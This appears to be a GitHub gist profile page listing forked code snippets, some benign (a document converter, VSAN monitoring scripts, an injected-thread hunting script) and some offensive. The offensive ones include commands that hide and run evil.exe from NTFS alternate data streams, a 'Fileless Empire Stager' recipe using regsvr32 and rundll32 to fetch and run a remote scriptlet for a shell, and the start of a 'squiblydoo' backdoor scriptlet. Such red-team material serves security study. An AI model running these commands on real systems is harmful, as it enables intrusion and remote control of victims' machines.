jamesshew

💭
setting my status
View GitHub Profile
@jamesshew
jamesshew / doc2markdown.py
Created August 1, 2018 13:23 — forked from goerz/doc2markdown.py
Convert a word (doc/docx) file to markdown
#!/usr/bin/env python
"""Convert a word (doc/docx) file to markdown"""
import sys
import os
import subprocess
SOFFICE = r'/Applications/LibreOffice.app/Contents/MacOS/soffice'
PANDOC = r'pandoc'
jamesshew / base64padding.ps1
Created June 7, 2018 12:03 — forked from obscuresec/base64padding.ps1
Base64 Padding in PowerShell
# define and encode test data
$TestString = 'This is a test. A short test for encoding and padding.'
$Encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($TestString))
# insert random '='
$Length = $Encoded.Length
$RandomChar = 1..($Length - 3) | Get-Random
$Encoded = $Encoded.Insert($RandomChar,'=')
# strip out '='
jamesshew / Exe_ADS_Methods.txt
Created January 18, 2018 16:37 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
#Add content to ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
#Executing the ADS content
* WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
* Rundll32
jamesshew / Get-VSANResyncStatus.ps1
Created January 17, 2018 22:05 — forked from rayterrill/Get-VSANResyncStatus.ps1
Get VSAN Resync Status using SSH
#requires https://github.com/darkoperator/Posh-SSH
function Get-VSANResyncStatus {
param(
[string]$esx_server,
[String]$esx_username,
[String]$esx_password
)
$secpasswd = ConvertTo-SecureString $esx_password -AsPlainText -Force
jamesshew / GetVSANDiskStats.ps1
Created January 17, 2018 22:05 — forked from rayterrill/GetVSANDiskStats.ps1
Uses PowerCLI to try to mimic what the RVC command vsan.disks_stats does.
<#PSScriptInfo
.VERSION 1.0
.GUID 4e9ee514-64cb-430d-afc9-fb0b24ca6c3b
.AUTHOR Ray Terrill
.COMPANYNAME Port of Portland
.DESCRIPTION This function tries to reconstruct what the RVC command "vsan.disks_stats ." does using PowerCLI. Shout out to @lamw for the idea.
#>
<#
.NOTES
===========================================================================
jamesshew / Get-InjectedThread.ps1
Created November 17, 2017 23:36 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
jamesshew / New-Detour.ps1
Created October 12, 2016 19:27 — forked from adamdriscoll/New-Detour.ps1
Example of how to use EasyHook with PowerShell to override GetSystemTimeAsFileTime
function New-Detour
{
param(
$Library,
$FunctionName,
[ScriptBlock]$Detour,
[String[]]$ReferencedAssemblies
)
#Download from easyhook.codeplex.com
jamesshew / HOWTO
Created May 2, 2016 16:59
Fileless Empire Stager
1. Create Empire Listener
2. Generate Stager
3. Host Stager Code At Some URL
4. Host .sct File At Some URL
5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll
6. Instantiate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() )
-Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec();
7. Wait for Shell...
jamesshew / Backdoor-Minimalist.sct
Created May 2, 2016 16:58
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[